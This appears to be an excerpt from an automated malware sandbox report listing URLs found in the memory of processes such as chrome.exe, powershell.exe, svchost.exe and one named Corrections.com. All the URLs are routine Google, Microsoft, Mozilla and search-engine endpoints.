            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
            Source: chrome.exe, 0000001D.00000003.2555933219.0000600400294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
            Source: chrome.exe, 0000001D.00000003.2531479263.00006004007E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2525423880.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chrome.exe, 0000001D.00000003.2532799851.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2581109973.0000600400C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537282781.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567164223.0000600400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icoit
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chrome.exe, 0000001D.00000003.2537620059.0000600400338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
            Source: chrome.exe, 0000001D.00000003.2534488464.0000600400D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2538918746.0000600400D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532036292.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2532761049.0000600400CF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533336865.0000600400D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2533277142.0000600400338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537620059.0000600400338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
            Source: chrome.exe, 0000001D.00000003.2513971916.000027CC00694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
            Source: chrome.exe, 0000001D.00000003.2509482537.000020C4002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2509502977.000020C4002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: Corrections.com, 0000001A.00000002.3006622611.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000001A.00000002.3004996971.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, K6XT0Z.26.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
            Source: chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
            Source: chrome.exe, 0000001D.00000003.2518269770.00006004004BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Corrections.com, 0000001A.00000002.3004594101.0000000003992000.00000004.00000800.00020000.00000000.sdmp, 9ZCBA1.26.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28FB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: edb.log.30.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: edb.log.30.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: edb.log.30.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28FB2000.00000004.00000800.00020000.00000000.sdmp, edb.log.30.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: powershell.exe, 00000009.00000002.2082140205.0000017A00227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: chrome.exe, 0000001D.00000003.2513971916.000027CC00694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
            Source: chrome.exe, 0000001D.00000003.2513971916.000027CC00694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gk
            Source: chrome.exe, 0000001D.00000003.2513971916.000027CC00694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
            Source: chrome.exe, 0000001D.00000003.2513971916.000027CC00694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
            Source: chrome.exe, 0000001D.00000003.2513971916.000027CC00694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
            Source: chrome.exe, 0000001D.00000003.2572689155.0000600402AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2572722383.0000600402AB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2572653266.0000600402AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
            Source: K6XT0Z.26.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
            Source: chrome.exe, 0000001D.00000003.2531446589.000060040037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2557743072.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
            Source: chrome.exe, 0000001D.00000003.2568277713.0000600402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
            Source: chrome.exe, 0000001D.00000003.2568277713.0000600402DA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
            Source: chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
            Source: chrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
            Source: chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
            Source: chrome.exe, 0000001D.00000003.2537526965.00006004010F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537661189.000060040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
            Source: chrome.exe, 0000001D.00000003.2513625099.000027CC003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
            Source: chrome.exe, 0000001D.00000003.2514402054.000027CC006F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2537322593.000060040040C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
            Source: chrome.exe, 0000001D.00000003.2513399171.000027CC003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
            Source: powershell.exe, 00000009.00000002.2122203319.0000017A7618D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: chrome.exe, 0000001D.00000003.2557159264.0000600400C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
            Source: chrome.exe, 0000001D.00000003.2578370556.000060040304C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578206013.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
            Source: chrome.exe, 0000001D.00000003.2567682620.000060040280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
            Source: powershell.exe, 00000009.00000002.2107972930.0000017A10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
            Source: chrome.exe, 0000001D.00000003.2579077248.00006004026DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
            Source: chrome.exe, 0000001D.00000003.2577269475.0000600403030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2577570541.0000600402FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001D.00000003.2578643950.0000600401C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
            Source: svchost.exe, 0000001E.00000003.2517110348.000001DA28FB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.30.dr, edb.log.30.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.30.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: chrome.exe, 0000001D.00000003.2533676754.00006004007AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
            Source: chrome.exe, 0000001D.00000003.2533676754.00006004007AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
            Source: chrome.exe, 0000001D.00000003.2533676754.00006004007AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
            Source: chrome.exe, 0000001D.00000003.2533676754.00006004007AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
            Source: chrome.exe, 0000001D.00000003.2533676754.00006004007AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
